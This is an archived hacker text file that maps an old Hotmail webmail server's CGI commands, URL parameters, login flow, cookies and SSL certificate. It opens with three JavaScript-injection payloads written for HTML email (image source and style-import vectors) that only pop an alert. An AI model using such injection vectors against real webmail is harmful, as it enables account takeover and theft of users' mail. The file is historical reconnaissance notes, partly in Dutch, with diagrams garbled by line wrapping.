informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/uploads/hotmail.txt

223 lines
6.6 KiB
Plaintext
Raw Blame History

The code that must be included in HTML email message is:
--------------------------------------------------------
<IMG LOWSRC="javascript:alert('Javascript is executed')">
--------------------------------------------------------
The code that must be included in HTML email message is:
--------------------------------------------------------
<IMG DYNSRC="javascript:alert('Javascript is executed')">
--------------------------------------------------------
The code that must be included in HTML email message is:
--------------------------------------------------------
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
--------------------------------------------------------
209.185.130.251 <fh_foxhound@hotmail.com>
UnderStanding the Hotmail Server by KGB of FX Ltd.
//this is the original file i made when doing my research
logins are changed, this may be spread only if author and source are known
-KGB, FX Ltd//
http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?disk=216.33.148.69_d679&login=
boink&f=33792&curmbox=ACTIVE&_lang= (here comes the e-mail id set by server)
(viewing main)
hotmaillogin
www.adress van hotmail box(main window)
| |
http://lw4fd.law4.hotmail.msn.com/cgi-bin/HoTMaiL?disk=216.33.148.69_d679&login
=boink&f=33792&curmbox=ACTIVE&_lang= | |
| | ip van comp |
| box nr.? op hotmail serv disk nr.
login
(viewing the email)
get msg command
|
http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?disk=216.33.148.69_d679&login=boinkc&f
=33792&curmbox=ACTIVE&_lang=&msg=MSG947245205.4&start=171614&len=1116&mfs=1023
| | | | |
| = dif = dif =dif stays the
MSG ID op per msg per msg permsg same
hotmail Serv.
(email)
lw4fd.law4 2 dezelfde cijfer means LOGGED in
|
loginwindow?
Notes:
* login=name&f=boxnr. stays the same.
* the cgi command changes, after the /cgi-bin/
* disk number after the ip stays the same.
* email id (MSG) are different.
* the mfs indicates the mail file server number?? (different per account)
* Hotmail has a Telnet server but access denied
http://lw7fd.law7.hotmail.msn.com/cgi-bin/HoTMaiL?disk=216.33.236.69_d1048&login=boink&f
|
changes
(lw4fd.law4)
=33792&curmbox=ACTIVE&_lang=&fti=yes
| |
stays the same first time login?
Note
* when you first enter your hotmail (HM) account it wil state &fti=yes
then when you enter it again,(or reload) without loging out the statement will go away.
&fti=yes /firstime
&t=957029515 /logout
|
changes
everytime
u logout
(folders)
curmbox=ACTIVE ;main (inbox)
curmbox=trAsH ;deleted msg
curmbox=SaVed ;sent msg
curmbox=drAfT ;drafts
curmbox=HM_BuLkMail ;bulk mail box
curmbox = current mail box
password?hint=1&disk=(ip)
block?disk=216.33.148.69_d679&login=boink&f=33792&curmbox=ACTIVE&_lang=&from=options
| | |
cgi command inbox the folder from where
block sender you came from
CGI Commands (after the /cgi-bin/)
compose? ;write mail msg
HoTMail? ;hotmail main
getmsg? ;read received e-mail
adresses? ;get adress
folders? ;look at folders
person? ;personal info
password? ;change password
password?hint=1&disk= ;secret question
options? ;view options
prefs? ;preferences
protect? ;inbox protector
block? ;block sender
filters? ;filters
pop? ;popmail
(change user)
http://lc5.law5.hotmail.passport.com/ppsecure/login?_lang=&id=2&ct=957030843
| | |
passport.com logout |
logout nr.
must be passport.com? selectbox
| |
http://lw7fd.law7.hotmail.msn.com/cgi-bin/sbox?disk=216.33.236.69_d1048&login=boink&f=
33792&curmbox=ACTIVE&_lang=&t=2AAAAAAAAD%2a3LRd%
2aQjGF3cIrAaxAfCyIELUCYwG6%2aIWUB3WWcdYsOQvw%24%24&p=2AAAAAAAAH70c3HrzX7%21fuNh9H8nwxN5Ren
ZdWZ3BOS2L4ORXyOppgMM5bCs5Us1owd6qJdSmq%
21FfkLC8t4V1duiEhNZT49ev9XXtV4ox6LCOTiYJpMUHUFva0jcDNKNuP8TOLmZj%216rY%24
|
encrypted password?
(change user)
http://lc5.law5.hotmail.passport.com/ppsecure/logout?id=2&ct=957038276&ru=http%3a%2f%2flc5%
2elaw5%2ehotmail%2epassport%2ecom%2fppsecure%2flogin%
3f_lang%3d%26id%3d2%26ct%3d957038276&disk=216.33.236.69_d1048&login=boink&f=33792&curmbox=
ACTIVE&_lang=
indicates
(hotmail.com)
|
http://lc4.law5.hotmail.passport.com/cgi-bin/login
| |
listcheck checks
from login/pass
1 to 8?
Note
* before login lc and law numbers are different
but when logged in numbers are the same and lc changes to lw(nr)fd.
* when you enter login name with no password you will get the right ip plus disknr.
(login check with right pw)
http://lw4fd.law4.hotmail.msn.com/cgi-bin/sbox?disk=216.33.148.69_d679&login=boink&f=
33792&curmbox=ACTIVE&_lang=&t=2AAAAAAAADEggSrB8teztqIsFxZv%21v5JVU4lgYH4sd2ofd5Iw8be5XIA%
24%24&p=2AAAAAAAADJRULJQWHrrecKIHZFbjDCtLTuDlW8aDSIGF5pLq5%2aB34dGsNu1WCIy%2azLszp%
21aG3zwbR3YNKAJuyLSHVvYbn2zAFUYX3jheJKVEFpvUTAhZipphuHS4FJIjg
(with wrong pw)
/cgi-bin/dologin
(checks password if right go to (example) lw4fd.law4 if not goes to (example) lc4.law5)
Note
* HM sets 2 Cookies, passport.com (MDP2) and hotmail.msn (HMP1)
http://lc4.law5.hotmail.passport.com/ppsecure/logout?id=2&ct=957885690&ru=
http%3a%2f%2flc4%2elaw5%2ehotmail%2epassport%2ecom%2fppsecure%2flogin%3f_lang
%3d%26id%3d2%26ct%3d957885690&disk=216.33.148.69_d679&login=boink&f=33792&curmbox
=ACTIVE&_lang=
- ABOUT HOTMAIL ENCRYPTION -
((SSL))
Their Certificate is given to passport.com
Given by Secure Server Certification Authority, RSA DAta Security Inc.
Version V1
serialnumber = 04B8 D90D FF0E 853B D1A1 F88D 91BE 09FD
The certificate expires thursday 31 august 2000 1:59:59
The public key is written in RSA (Rivest-Shamir-Adelman) 512 bits:
3048 0241 00C0 8EF1 2908 4FD1 C66C 16A1 8C26 AEC7 5C11 6F3D 0EA2 5389
532D 63A3 7F76 47CC 9C7E D363 EE45 0EF3 FE1A 6EEF EF6A 3510 E743 C69F
81E0 8A1D F9A7 BCE6 47DB 0F3F 1F02 0301 0001
Vingerprint-Algorithm is in SHA1:
E328 52BC F857 D4D3 A15D 54B7 25E0 AAE4 9255 A2CB
Digital Signature is in MD5 and RSA
GrtZ
KGB ---=> FX Ltd.
Reference in New Issue View Git Blame Copy Permalink